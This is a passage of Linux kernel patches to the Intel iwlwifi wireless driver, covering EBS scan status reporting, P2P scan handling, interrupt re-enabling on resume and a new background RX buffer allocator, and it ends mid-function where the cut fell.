-352,6 +352,20 @@ int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, return 0; } +static const char *iwl_mvm_ebs_status_str(enum iwl_scan_ebs_status status) +{ + switch (status) { + case IWL_SCAN_EBS_SUCCESS: + return "successful"; + case IWL_SCAN_EBS_INACTIVE: + return "inactive"; + case IWL_SCAN_EBS_FAILED: + case IWL_SCAN_EBS_CHAN_NOT_FOUND: + default: + return "failed"; + } +} + int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd) @@ -359,7 +373,6 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_periodic_scan_complete *scan_notif = (void *)pkt->data; bool aborted = (scan_notif->status == IWL_SCAN_OFFLOAD_ABORTED); - bool ebs_successful = (scan_notif->ebs_status == IWL_SCAN_EBS_SUCCESS); /* scan status must be locked for proper checking */ lockdep_assert_held(&mvm->mutex); @@ -379,13 +392,13 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, IWL_DEBUG_SCAN(mvm, "Scheduled scan %s, EBS status %s\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_STOPPING_SCHED; } else if (mvm->scan_status & IWL_MVM_SCAN_STOPPING_REGULAR) { IWL_DEBUG_SCAN(mvm, "Regular scan %s, EBS status %s\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_STOPPING_REGULAR; } else if (mvm->scan_status & IWL_MVM_SCAN_SCHED) { @@ -393,14 +406,14 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, IWL_DEBUG_SCAN(mvm, "Scheduled scan %s, EBS status %s (FW)\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; ieee80211_sched_scan_stopped(mvm->hw); } else if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) { IWL_DEBUG_SCAN(mvm, "Regular scan %s, EBS status %s (FW)\n", aborted ? "aborted" : "completed", - ebs_successful ? 
"successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; ieee80211_scan_completed(mvm->hw, @@ -408,7 +421,9 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); } - mvm->last_ebs_successful = ebs_successful; + mvm->last_ebs_successful = + scan_notif->ebs_status == IWL_SCAN_EBS_SUCCESS || + scan_notif->ebs_status == IWL_SCAN_EBS_INACTIVE; return 0; } @@ -1376,10 +1391,10 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, uid, mvm->scan_uid_status[uid], notif->status == IWL_SCAN_OFFLOAD_COMPLETED ? "completed" : "aborted", - notif->ebs_status == IWL_SCAN_EBS_SUCCESS ? - "success" : "failed"); + iwl_mvm_ebs_status_str(notif->ebs_status)); - if (notif->ebs_status) + if (notif->ebs_status != IWL_SCAN_EBS_SUCCESS && + notif->ebs_status != IWL_SCAN_EBS_INACTIVE) mvm->last_ebs_successful = false; mvm->scan_uid_status[uid] = 0; From 15286e26d28aa21754510b86edee67a1d6537449 Mon Sep 17 00:00:00 2001 From: David Spinadel Date: Tue, 26 May 2015 10:32:19 +0300 Subject: [PATCH 626/872] iwlwifi: mvm: don't use EBS for P2P find Don't use EBS for P2P find to make sure we find all GOs in our only attempt. Signed-off-by: David Spinadel Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 9409237435b6..794109e617a1 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -770,19 +770,23 @@ static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids, iwl_mvm_max_scan_ie_fw_cmd_room(mvm))); } -static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, int n_iterations) +static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + int n_iterations) { const struct iwl_ucode_capabilities *capa = &mvm->fw->ucode_capa; /* We can only use EBS if: * 1. the feature is supported; * 2. the last EBS was successful; - * 3. if only single scan, the single scan EBS API is supported. + * 3. if only single scan, the single scan EBS API is supported; + * 4. it's not a p2p find operation. 
*/ return ((capa->flags & IWL_UCODE_TLV_FLAGS_EBS_SUPPORT) && mvm->last_ebs_successful && (n_iterations > 1 || - (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS))); + (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && + vif->type != NL80211_IFTYPE_P2P_DEVICE); } static int iwl_mvm_scan_total_iterations(struct iwl_mvm_scan_params *params) @@ -860,7 +864,7 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, cmd->schedule[1].iterations = params->schedule[1].iterations; cmd->schedule[1].full_scan_mul = params->schedule[1].iterations; - if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) { + if (iwl_mvm_scan_use_ebs(mvm, vif, n_iterations)) { cmd->channel_opt[0].flags = cpu_to_le16(IWL_SCAN_CHANNEL_FLAG_EBS | IWL_SCAN_CHANNEL_FLAG_EBS_ACCURATE | @@ -1102,7 +1106,7 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, cmd->uid = cpu_to_le32(uid); cmd->general_flags = cpu_to_le32(iwl_mvm_scan_umac_flags(mvm, params)); - if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) + if (iwl_mvm_scan_use_ebs(mvm, vif, n_iterations)) cmd->channel_flags = IWL_SCAN_CHANNEL_FLAG_EBS | IWL_SCAN_CHANNEL_FLAG_EBS_ACCURATE | IWL_SCAN_CHANNEL_FLAG_CACHE_ADD; From 54154618b5633a2ecb02ba7fe8890c7fec80c404 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Thu, 28 May 2015 16:50:12 +0300 Subject: [PATCH 627/872] iwlwifi: pcie: re-enable interrupts on resume On resume, all the interrupts are masked (CSR_INT_MASK is 0), and ict is disabled. Re-configure them both. Signed-off-by: Eliad Peller Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-trans.h | 2 ++ drivers/net/wireless/iwlwifi/mvm/d3.c | 3 ++- drivers/net/wireless/iwlwifi/pcie/drv.c | 17 ++++++++++++++--- 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.h b/drivers/net/wireless/iwlwifi/iwl-trans.h index eb34b94faf03..87a230a7f4b6 100644 --- a/drivers/net/wireless/iwlwifi/iwl-trans.h +++ b/drivers/net/wireless/iwlwifi/iwl-trans.h @@ -641,6 +641,8 @@ struct iwl_trans { enum iwl_d0i3_mode d0i3_mode; + bool wowlan_d0i3; + /* pointer to trans specific struct */ /*Ensure that this pointer will always be aligned to sizeof pointer */ char trans_specific[0] __aligned(sizeof(void *)); diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 423c519f06bc..4165d104e4c3 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1170,7 +1170,8 @@ int iwl_mvm_suspend(struct ieee80211_hw *hw, struct cfg80211_wowlan *wowlan) struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); iwl_trans_suspend(mvm->trans); - if (wowlan->any) { + mvm->trans->wowlan_d0i3 = wowlan->any; + if (mvm->trans->wowlan_d0i3) { /* 'any' trigger means d0i3 usage */ if (mvm->trans->d0i3_mode == IWL_D0I3_MODE_ON_SUSPEND) { int ret = iwl_mvm_enter_d0i3_sync(mvm); diff --git a/drivers/net/wireless/iwlwifi/pcie/drv.c b/drivers/net/wireless/iwlwifi/pcie/drv.c index b18569734922..2ed1e4d2774d 100644 --- a/drivers/net/wireless/iwlwifi/pcie/drv.c +++ b/drivers/net/wireless/iwlwifi/pcie/drv.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2007 - 2014 Intel Corporation. All rights reserved. 
- * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -629,7 +629,18 @@ static int iwl_pci_resume(struct device *device) if (!trans->op_mode) return 0; - iwl_enable_rfkill_int(trans); + /* + * On suspend, ict is disabled, and the interrupt mask + * gets cleared. Reconfigure them both in case of d0i3 + * image. Otherwise, only enable rfkill interrupt (in + * order to keep track of the rfkill status) + */ + if (trans->wowlan_d0i3) { + iwl_pcie_reset_ict(trans); + iwl_enable_interrupts(trans); + } else { + iwl_enable_rfkill_int(trans); + } hw_rfkill = iwl_is_rfkill_set(trans); iwl_trans_pcie_rf_kill(trans, hw_rfkill); From 5f17570354f91275b0a37a4da33d29a2ab57d32e Mon Sep 17 00:00:00 2001 From: Sara Sharon Date: Tue, 28 Apr 2015 12:56:54 +0300 Subject: [PATCH 628/872] iwlwifi: pcie: New RBD allocation model As a preperation for multiple RX queues change the RBD allocation model. The new model includes a background allocator. The allocator is called by the interrupt handler when there are two released buffers by the queue, and the allocator starts allocating eight pages per request. When the queue has released 8 pages it tries claiming the request. If the pages are not ready - it keeps claiming. This new model should make sure that RBDs are always available across the multiple queues. The RBDs are transferred between the allocator and the queue. The queue moves the free RBDs upon freeing them to the allocator. The allocator moves them back to the queue's possession when the request is claimed. The allocator has an initial pool to make sure there are always RBDs available for the request completion. Release of the buffers at exit is done per pools - the allocator frees its own initial pool and the queue frees its own pool. Existing code refactor - -Queue's initial pool is the size of the queue only as the allocation of the new buffers no longer uses this pool. -Removal of replenish background work, and replenish calls in the interrupt handler and restock(). -The replenish() and the rxq used_list are used only during initialization. -Moved page allocation to a new function for code reuse. New code - Allocator code - new structure and functions. Interrupt handler uses the allocator functions for replenishing buffers. Reuse of the restock() method. 
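As a rough illustration of the post/claim handshake described above, here is a simplified sketch with invented names (rbd_allocator, rxq_*), not the driver's real structures: the queue posts an allocation request after handing over 2 released RBDs, the background worker fills 8 buffers per request, and the queue claims a completed request once it has released 8 in total.

#include <linux/atomic.h>
#include <linux/types.h>

#define POST_REQ_ALLOC	2	/* post a request after 2 released RBDs */
#define CLAIM_REQ_ALLOC	8	/* each request yields 8 ready RBDs */

struct rbd_allocator {
	atomic_t req_pending;	/* posted, not yet filled by the worker */
	atomic_t req_ready;	/* filled, waiting to be claimed */
};

/* Queue side: account a released (page-stolen) RBD; every 8 releases,
 * a request is posted once the first 2 have been handed over. */
static void rxq_release_rbd(struct rbd_allocator *rba, unsigned int *used_count)
{
	(*used_count)++;
	if ((*used_count % CLAIM_REQ_ALLOC) == POST_REQ_ALLOC)
		atomic_inc(&rba->req_pending);	/* then schedule the worker */
}

/* Queue side: try to claim one completed request (8 RBDs); the caller
 * simply retries later if the worker has not finished yet. */
static bool rxq_claim_rbds(struct rbd_allocator *rba)
{
	if (atomic_dec_return(&rba->req_ready) < 0) {
		atomic_inc(&rba->req_ready);	/* nothing ready, undo */
		return false;
	}
	/* move CLAIM_REQ_ALLOC buffers from the allocator to rx_free here */
	return true;
}

/* Worker side: for every pending request, allocate 8 pages and attach
 * them to RBDs, then flip the request from pending to ready. */
static void rbd_allocator_work(struct rbd_allocator *rba)
{
	while (atomic_read(&rba->req_pending)) {
		/* page allocation and DMA mapping would happen here */
		atomic_dec(&rba->req_pending);
		atomic_inc(&rba->req_ready);
	}
}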
Signed-off-by: Sara Sharon Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fh.h | 6 - drivers/net/wireless/iwlwifi/pcie/internal.h | 51 ++- drivers/net/wireless/iwlwifi/pcie/rx.c | 414 +++++++++++++++---- 3 files changed, 374 insertions(+), 97 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fh.h b/drivers/net/wireless/iwlwifi/iwl-fh.h index d45dc021cda2..d56064861a9c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fh.h +++ b/drivers/net/wireless/iwlwifi/iwl-fh.h @@ -438,12 +438,6 @@ static inline unsigned int FH_MEM_CBBC_QUEUE(unsigned int chnl) #define RX_QUEUE_MASK 255 #define RX_QUEUE_SIZE_LOG 8 -/* - * RX related structures and functions - */ -#define RX_FREE_BUFFERS 64 -#define RX_LOW_WATERMARK 8 - /** * struct iwl_rb_status - reserve buffer status * host memory mapped FH registers diff --git a/drivers/net/wireless/iwlwifi/pcie/internal.h b/drivers/net/wireless/iwlwifi/pcie/internal.h index 01996c9d98a7..9a3dae676cc5 100644 --- a/drivers/net/wireless/iwlwifi/pcie/internal.h +++ b/drivers/net/wireless/iwlwifi/pcie/internal.h @@ -44,6 +44,15 @@ #include "iwl-io.h" #include "iwl-op-mode.h" +/* + * RX related structures and functions + */ +#define RX_NUM_QUEUES 1 +#define RX_POST_REQ_ALLOC 2 +#define RX_CLAIM_REQ_ALLOC 8 +#define RX_POOL_SIZE ((RX_CLAIM_REQ_ALLOC - RX_POST_REQ_ALLOC) * RX_NUM_QUEUES) +#define RX_LOW_WATERMARK 8 + struct iwl_host_cmd; /*This file includes the declaration that are internal to the @@ -77,29 +86,29 @@ struct isr_statistics { * struct iwl_rxq - Rx queue * @bd: driver's pointer to buffer of receive buffer descriptors (rbd) * @bd_dma: bus address of buffer of receive buffer descriptors (rbd) - * @pool: - * @queue: * @read: Shared index to newest available Rx buffer * @write: Shared index to oldest written Rx packet * @free_count: Number of pre-allocated buffers in rx_free + * @used_count: Number of RBDs handled to allocator to use for allocation * @write_actual: - * @rx_free: list of free SKBs for use - * @rx_used: List of Rx buffers with no SKB + * @rx_free: list of RBDs with allocated RB ready for use + * @rx_used: list of RBDs with no RB attached * @need_update: flag to indicate we need to update read/write index * @rb_stts: driver's pointer to receive buffer status * @rb_stts_dma: bus address of receive buffer status * @lock: + * @pool: initial pool of iwl_rx_mem_buffer for the queue + * @queue: actual rx queue * * NOTE: rx_free and rx_used are used as a FIFO for iwl_rx_mem_buffers */ struct iwl_rxq { __le32 *bd; dma_addr_t bd_dma; - struct iwl_rx_mem_buffer pool[RX_QUEUE_SIZE + RX_FREE_BUFFERS]; - struct iwl_rx_mem_buffer *queue[RX_QUEUE_SIZE]; u32 read; u32 write; u32 free_count; + u32 used_count; u32 write_actual; struct list_head rx_free; struct list_head rx_used; @@ -107,6 +116,32 @@ struct iwl_rxq { struct iwl_rb_status *rb_stts; dma_addr_t rb_stts_dma; spinlock_t lock; + struct iwl_rx_mem_buffer pool[RX_QUEUE_SIZE]; + struct iwl_rx_mem_buffer *queue[RX_QUEUE_SIZE]; +}; + +/** + * struct iwl_rb_allocator - Rx allocator + * @pool: initial pool of allocator + * @req_pending: number of requests the allcator had not processed yet + * @req_ready: number of requests honored and ready for claiming + * @rbd_allocated: RBDs with pages allocated and ready to be handled to + * the queue. This is a list of &struct iwl_rx_mem_buffer + * @rbd_empty: RBDs with no page attached for allocator use. 
This is a list + * of &struct iwl_rx_mem_buffer + * @lock: protects the rbd_allocated and rbd_empty lists + * @alloc_wq: work queue for background calls + * @rx_alloc: work struct for background calls + */ +struct iwl_rb_allocator { + struct iwl_rx_mem_buffer pool[RX_POOL_SIZE]; + atomic_t req_pending; + atomic_t req_ready; + struct list_head rbd_allocated; + struct list_head rbd_empty; + spinlock_t lock; + struct workqueue_struct *alloc_wq; + struct work_struct rx_alloc; }; struct iwl_dma_ptr { @@ -250,7 +285,7 @@ iwl_pcie_get_scratchbuf_dma(struct iwl_txq *txq, int idx) /** * struct iwl_trans_pcie - PCIe transport specific data * @rxq: all the RX queue data - * @rx_replenish: work that will be called when buffers need to be allocated + * @rba: allocator for RX replenishing * @drv - pointer to iwl_drv * @trans: pointer to the generic transport area * @scd_base_addr: scheduler sram base address in SRAM @@ -273,7 +308,7 @@ iwl_pcie_get_scratchbuf_dma(struct iwl_txq *txq, int idx) */ struct iwl_trans_pcie { struct iwl_rxq rxq; - struct work_struct rx_replenish; + struct iwl_rb_allocator rba; struct iwl_trans *trans; struct iwl_drv *drv; diff --git a/drivers/net/wireless/iwlwifi/pcie/rx.c b/drivers/net/wireless/iwlwifi/pcie/rx.c index adad8d0fae7f..a3fbaa0ef5e0 100644 --- a/drivers/net/wireless/iwlwifi/pcie/rx.c +++ b/drivers/net/wireless/iwlwifi/pcie/rx.c @@ -1,7 +1,7 @@ /****************************************************************************** * * Copyright(c) 2003 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * Portions of this file are derived from the ipw3945 project, as well * as portions of the ieee80211 subsystem header files. @@ -74,16 +74,29 @@ * resets the Rx queue buffers with new memory. * * The management in the driver is as follows: - * + A list of pre-allocated SKBs is stored in iwl->rxq->rx_free. When - * iwl->rxq->free_count drops to or below RX_LOW_WATERMARK, work is scheduled - * to replenish the iwl->rxq->rx_free. - * + In iwl_pcie_rx_replenish (scheduled) if 'processed' != 'read' then the - * iwl->rxq is replenished and the READ INDEX is updated (updating the - * 'processed' and 'read' driver indexes as well) + * + A list of pre-allocated RBDs is stored in iwl->rxq->rx_free. + * When the interrupt handler is called, the request is processed. + * The page is either stolen - transferred to the upper layer + * or reused - added immediately to the iwl->rxq->rx_free list. + * + When the page is stolen - the driver updates the matching queue's used + * count, detaches the RBD and transfers it to the queue used list. + * When there are two used RBDs - they are transferred to the allocator empty + * list. Work is then scheduled for the allocator to start allocating + * eight buffers. + * When there are another 6 used RBDs - they are transferred to the allocator + * empty list and the driver tries to claim the pre-allocated buffers and + * add them to iwl->rxq->rx_free. If it fails - it continues to claim them + * until ready. + * When there are 8+ buffers in the free list - either from allocation or from + * 8 reused unstolen pages - restock is called to update the FW and indexes. 
+ * + In order to make sure the allocator always has RBDs to use for allocation + * the allocator has initial pool in the size of num_queues*(8-2) - the + * maximum missing RBDs per allocation request (request posted with 2 + * empty RBDs, there is no guarantee when the other 6 RBDs are supplied). + * The queues supplies the recycle of the rest of the RBDs. * + A received packet is processed and handed to the kernel network stack, * detached from the iwl->rxq. The driver 'processed' index is updated. - * + The Host/Firmware iwl->rxq is replenished at irq thread time from the - * rx_free list. If there are no allocated buffers in iwl->rxq->rx_free, + * + If there are no allocated buffers in iwl->rxq->rx_free, * the READ INDEX is not incremented and iwl->status(RX_STALLED) is set. * If there were enough free buffers and RX_STALLED is set it is cleared. * @@ -92,18 +105,32 @@ * * iwl_rxq_alloc() Allocates rx_free * iwl_pcie_rx_replenish() Replenishes rx_free list from rx_used, and calls - * iwl_pcie_rxq_restock + * iwl_pcie_rxq_restock. + * Used only during initialization. * iwl_pcie_rxq_restock() Moves available buffers from rx_free into Rx * queue, updates firmware pointers, and updates - * the WRITE index. If insufficient rx_free buffers - * are available, schedules iwl_pcie_rx_replenish + * the WRITE index. + * iwl_pcie_rx_allocator() Background work for allocating pages. * * -- enable interrupts -- * ISR - iwl_rx() Detach iwl_rx_mem_buffers from pool up to the * READ INDEX, detaching the SKB from the pool. * Moves the packet buffer from queue to rx_used. + * Posts and claims requests to the allocator. * Calls iwl_pcie_rxq_restock to refill any empty * slots. + * + * RBD life-cycle: + * + * Init: + * rxq.pool -> rxq.rx_used -> rxq.rx_free -> rxq.queue + * + * Regular Receive interrupt: + * Page Stolen: + * rxq.queue -> rxq.rx_used -> allocator.rbd_empty -> + * allocator.rbd_allocated -> rxq.rx_free -> rxq.queue + * Page not Stolen: + * rxq.queue -> rxq.rx_free -> rxq.queue * ... * */ @@ -240,10 +267,6 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) rxq->free_count--; } spin_unlock(&rxq->lock); - /* If the pre-allocated buffer pool is dropping low, schedule to - * refill it */ - if (rxq->free_count <= RX_LOW_WATERMARK) - schedule_work(&trans_pcie->rx_replenish); /* If we've added more space for the firmware to place data, tell it. * Increment device's write pointer in multiples of 8. */ @@ -254,6 +277,44 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) } } +/* + * iwl_pcie_rx_alloc_page - allocates and returns a page. + * + */ +static struct page *iwl_pcie_rx_alloc_page(struct iwl_trans *trans) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rxq *rxq = &trans_pcie->rxq; + struct page *page; + gfp_t gfp_mask = GFP_KERNEL; + + if (rxq->free_count > RX_LOW_WATERMARK) + gfp_mask |= __GFP_NOWARN; + + if (trans_pcie->rx_page_order > 0) + gfp_mask |= __GFP_COMP; + + /* Alloc a new receive buffer */ + page = alloc_pages(gfp_mask, trans_pcie->rx_page_order); + if (!page) { + if (net_ratelimit()) + IWL_DEBUG_INFO(trans, "alloc_pages failed, order: %d\n", + trans_pcie->rx_page_order); + /* Issue an error if the hardware has consumed more than half + * of its free buffer list and we don't have enough + * pre-allocated buffers. +` */ + if (rxq->free_count <= RX_LOW_WATERMARK && + iwl_rxq_space(rxq) > (RX_QUEUE_SIZE / 2) && + net_ratelimit()) + IWL_CRIT(trans, + "Failed to alloc_pages with GFP_KERNEL. 
Only %u free buffers remaining.\n", + rxq->free_count); + return NULL; + } + return page; +} + /* * iwl_pcie_rxq_alloc_rbs - allocate a page for each used RBD * @@ -263,13 +324,12 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) * iwl_pcie_rxq_restock. The latter function will update the HW to use the newly * allocated buffers. */ -static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority) +static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; struct iwl_rx_mem_buffer *rxb; struct page *page; - gfp_t gfp_mask = priority; while (1) { spin_lock(&rxq->lock); @@ -279,32 +339,10 @@ static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority) } spin_unlock(&rxq->lock); - if (rxq->free_count > RX_LOW_WATERMARK) - gfp_mask |= __GFP_NOWARN; - - if (trans_pcie->rx_page_order > 0) - gfp_mask |= __GFP_COMP; - /* Alloc a new receive buffer */ - page = alloc_pages(gfp_mask, trans_pcie->rx_page_order); - if (!page) { - if (net_ratelimit()) - IWL_DEBUG_INFO(trans, "alloc_pages failed, " - "order: %d\n", - trans_pcie->rx_page_order); - - if ((rxq->free_count <= RX_LOW_WATERMARK) && - net_ratelimit()) - IWL_CRIT(trans, "Failed to alloc_pages with %s." - "Only %u free buffers remaining.\n", - priority == GFP_ATOMIC ? - "GFP_ATOMIC" : "GFP_KERNEL", - rxq->free_count); - /* We don't reschedule replenish work here -- we will - * call the restock method and if it still needs - * more buffers it will schedule replenish */ + page = iwl_pcie_rx_alloc_page(trans); + if (!page) return; - } spin_lock(&rxq->lock); @@ -355,7 +393,7 @@ static void iwl_pcie_rxq_free_rbs(struct iwl_trans *trans) lockdep_assert_held(&rxq->lock); - for (i = 0; i < RX_FREE_BUFFERS + RX_QUEUE_SIZE; i++) { + for (i = 0; i < RX_QUEUE_SIZE; i++) { if (!rxq->pool[i].page) continue; dma_unmap_page(trans->dev, rxq->pool[i].page_dma, @@ -372,32 +410,144 @@ static void iwl_pcie_rxq_free_rbs(struct iwl_trans *trans) * When moving to rx_free an page is allocated for the slot. * * Also restock the Rx queue via iwl_pcie_rxq_restock. - * This is called as a scheduled work item (except for during initialization) + * This is called only during initialization */ -static void iwl_pcie_rx_replenish(struct iwl_trans *trans, gfp_t gfp) +static void iwl_pcie_rx_replenish(struct iwl_trans *trans) { - iwl_pcie_rxq_alloc_rbs(trans, gfp); + iwl_pcie_rxq_alloc_rbs(trans); iwl_pcie_rxq_restock(trans); } -static void iwl_pcie_rx_replenish_work(struct work_struct *data) +/* + * iwl_pcie_rx_allocator - Allocates pages in the background for RX queues + * + * Allocates for each received request 8 pages + * Called as a scheduled work item. 
+ */ +static void iwl_pcie_rx_allocator(struct iwl_trans *trans) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + + while (atomic_read(&rba->req_pending)) { + int i; + struct list_head local_empty; + struct list_head local_allocated; + + INIT_LIST_HEAD(&local_allocated); + spin_lock(&rba->lock); + /* swap out the entire rba->rbd_empty to a local list */ + list_replace_init(&rba->rbd_empty, &local_empty); + spin_unlock(&rba->lock); + + for (i = 0; i < RX_CLAIM_REQ_ALLOC;) { + struct iwl_rx_mem_buffer *rxb; + struct page *page; + + /* List should never be empty - each reused RBD is + * returned to the list, and initial pool covers any + * possible gap between the time the page is allocated + * to the time the RBD is added. + */ + BUG_ON(list_empty(&local_empty)); + /* Get the first rxb from the rbd list */ + rxb = list_first_entry(&local_empty, + struct iwl_rx_mem_buffer, list); + BUG_ON(rxb->page); + + /* Alloc a new receive buffer */ + page = iwl_pcie_rx_alloc_page(trans); + if (!page) + continue; + rxb->page = page; + + /* Get physical address of the RB */ + rxb->page_dma = dma_map_page(trans->dev, page, 0, + PAGE_SIZE << trans_pcie->rx_page_order, + DMA_FROM_DEVICE); + if (dma_mapping_error(trans->dev, rxb->page_dma)) { + rxb->page = NULL; + __free_pages(page, trans_pcie->rx_page_order); + continue; + } + /* dma address must be no more than 36 bits */ + BUG_ON(rxb->page_dma & ~DMA_BIT_MASK(36)); + /* and also 256 byte aligned! */ + BUG_ON(rxb->page_dma & DMA_BIT_MASK(8)); + + /* move the allocated entry to the out list */ + list_move(&rxb->list, &local_allocated); + i++; + } + + spin_lock(&rba->lock); + /* add the allocated rbds to the allocator allocated list */ + list_splice_tail(&local_allocated, &rba->rbd_allocated); + /* add the unused rbds back to the allocator empty list */ + list_splice_tail(&local_empty, &rba->rbd_empty); + spin_unlock(&rba->lock); + + atomic_dec(&rba->req_pending); + atomic_inc(&rba->req_ready); + } +} + +/* + * iwl_pcie_rx_allocator_get - Returns the pre-allocated pages +.* +.* Called by queue when the queue posted allocation request and + * has freed 8 RBDs in order to restock itself. 
+ */ +static int iwl_pcie_rx_allocator_get(struct iwl_trans *trans, + struct iwl_rx_mem_buffer + *out[RX_CLAIM_REQ_ALLOC]) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + int i; + + if (atomic_dec_return(&rba->req_ready) < 0) { + atomic_inc(&rba->req_ready); + IWL_DEBUG_RX(trans, + "Allocation request not ready, pending requests = %d\n", + atomic_read(&rba->req_pending)); + return -ENOMEM; + } + + spin_lock(&rba->lock); + for (i = 0; i < RX_CLAIM_REQ_ALLOC; i++) { + /* Get next free Rx buffer, remove it from free list */ + out[i] = list_first_entry(&rba->rbd_allocated, + struct iwl_rx_mem_buffer, list); + list_del(&out[i]->list); + } + spin_unlock(&rba->lock); + + return 0; +} + +static void iwl_pcie_rx_allocator_work(struct work_struct *data) { + struct iwl_rb_allocator *rba_p = + container_of(data, struct iwl_rb_allocator, rx_alloc); struct iwl_trans_pcie *trans_pcie = - container_of(data, struct iwl_trans_pcie, rx_replenish); + container_of(rba_p, struct iwl_trans_pcie, rba); - iwl_pcie_rx_replenish(trans_pcie->trans, GFP_KERNEL); + iwl_pcie_rx_allocator(trans_pcie->trans); } static int iwl_pcie_rx_alloc(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; struct device *dev = trans->dev; memset(&trans_pcie->rxq, 0, sizeof(trans_pcie->rxq)); spin_lock_init(&rxq->lock); + spin_lock_init(&rba->lock); if (WARN_ON(rxq->bd || rxq->rb_stts)) return -EINVAL; @@ -487,15 +637,49 @@ static void iwl_pcie_rx_init_rxb_lists(struct iwl_rxq *rxq) INIT_LIST_HEAD(&rxq->rx_free); INIT_LIST_HEAD(&rxq->rx_used); rxq->free_count = 0; + rxq->used_count = 0; - for (i = 0; i < RX_FREE_BUFFERS + RX_QUEUE_SIZE; i++) + for (i = 0; i < RX_QUEUE_SIZE; i++) list_add(&rxq->pool[i].list, &rxq->rx_used); } +static void iwl_pcie_rx_init_rba(struct iwl_rb_allocator *rba) +{ + int i; + + lockdep_assert_held(&rba->lock); + + INIT_LIST_HEAD(&rba->rbd_allocated); + INIT_LIST_HEAD(&rba->rbd_empty); + + for (i = 0; i < RX_POOL_SIZE; i++) + list_add(&rba->pool[i].list, &rba->rbd_empty); +} + +static void iwl_pcie_rx_free_rba(struct iwl_trans *trans) +{ + 